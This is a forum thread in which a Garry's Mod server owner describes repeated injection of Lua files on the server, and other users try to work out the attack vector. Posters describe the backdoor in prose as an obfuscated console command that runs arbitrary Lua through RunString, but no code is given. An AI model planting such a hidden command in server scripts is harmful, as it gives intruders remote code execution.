In the past few months my server has been repeatedly injected with files that add a command that allow RunString(). Most recently lua/includes/modules/usermessage.lua had a line added that added a concommand with RunString in it. My server is not shared, and has no vulnerabilities that I know of.
I thought I would share, because this may help other server owners find out the source of their problems. I don't, unfortunately, know the vector of attack.
Here is the attacker's information so far, if you are curious:
[url]http://pastebin.com/raw.php?i=UEAU1fbe[/url]
Could it be something that was added with the lua_run exploit?
The lua_run was a red herring, I don't think it was an issue despite how that thread got some attention. I was basically making a routine batch search of RunString and came across it, didn't occur to me that it was supposed to be included in base gamemode.
This however, is obviously malicious. Rather commands added to pre-existing lua files that allow arbitrary lua code to be run. Sometimes they add a new file in lua/autorun, sometimes they just modify already existing files.
Could you be more specific about what exactly you know.
Like, Give us information what he did try to run, what addons or scripts youre running, If any at all(vanilla gmod), and if you have any clues as a victim how this has been done. You say that you dont know how this was done, But at the same time you give us information about the attacker, so how did you findout that it was this user who was behind the attacks?
The attacker usually does interesting stuff like play music via HTML panels, spawn zombies, etcetera. We could tell it was him because he would go AFK each time before something happened. Each time he was probably looking for music to play, or preparing to run the next piece of Lua. We could tell he had two accounts because of the same IP eventually. He changes IP regularly though. I have wiremod, ULX, and some other minor scripts, nothing out of the ordinary.
Yes, I am almost 100% sure it is that person because they've managed to unban themself several times, and is on the server EVERY time this happens. Basically he would just jump around for a while, and as soon as someone requested music he'd go AFK, as soon as music starts playing he starts moving around again. And of course after both of his accounts were banned, then it stopped.
Here is a video, it's a bit amusing:
[URL]http://s95.photobucket.com/albums/l137/pipedude/?action=view¤t=hl22011-04-1714-23-00-26.mp4[/URL]
I have no zombie mods on the server, etc. He is most definitely using the command that was somehow uploaded onto the server into a lua file.
EDIT: and no, the video in the file was not added afterwards, the attacker was actually playing it through an HTML panel.
Can you paste here the code what he's been adding to your luas?
Also give us the full list of addons and modules, Natively gmod lua should not be able to write any other files than txt, even though some flaws are known to exist which allow writing other types of files but they're not lua related.
The fact that hes playing music on the server can be something like advanced manipulating of door tool or such, what worries me is the ability to write files. This would mean theres more into this than just badly written luas.
If we get to know what methods hes most likely to use, we can maybe come up with a way to prevent the next attack and capture whatever information he tried to run inorder to do the preparation work.
If someone can run Lua on your server, they could just be using an HTML panel to play music. I don't see what a door tool has to do with it. I have no custom modules.
Since you said yourself that you can't do this with Lua, then I don't see the point in telling you what addons I have. The only major ones are wiremod and ulx.
I don't have samples readily available, but he obfuscates the console command by using character codes to name the command. It's basically just a ConCommand that does RunString on the parameter. If you know anything about Lua you'd understand.
[QUOTE=infinitywrai;29858657]If someone can run Lua on your server, they could just be using an HTML panel to play music. I don't see what a door tool has to do with it. I have no custom modules.
Since you said yourself that you can't do this with Lua, then I don't see the point in telling you what addons I have. The only major ones are wiremod and ulx.
I don't have samples readily available, but he obfuscates the console command by using character codes to name the command. It's basically just a ConCommand that does RunString on the parameter. If you know anything about Lua you'd understand.[/QUOTE]
I can't really help you if you're being mysterious about everything.
"Dude this guy did some stuff, help!"
"Well, what'd he do?"
"I can't tell you just help me!"
-_-
[QUOTE=Deprehensio;29859160]"Dude this guy did some stuff, help!"
"Well, what'd he do?"
"I can't tell you just help me!"
-_-[/QUOTE]
Quoted for justice.
Okay, We got an flaw, exploit and the exploiter.
The flaw is either:
A) Known.
B) Unknown.
Since we don't know what it is, It's unknown until proven otherwise. There's plenty of possibilities, And as i said, Gmod lua doesn't natively have possibility of writing things into your server. The file writing is resricted to data folder, and the filetype is resricted to txt. This means either there's something addon on your server which allows this, or then there's something new. Either way, We need the information what your server is running inorder to create similiar conditions to look into it. Running commands on servers isn't anything new, As i already said, There are flawed tools, scripts and addons which have flaws and thus allow creating dangerous entities or running commands. Again, we need information to solve this. When we have the information, and if we can't figure out what flaw hes using, we can still use the simulated enviroment to try penetrate the security.
Now, you said you're unable to ban him. If you help us solve this problem i will aid you with permanently keepping him off the server regardless of his IP / ID.
Sorry, you need to Log In to post a reply to this thread.
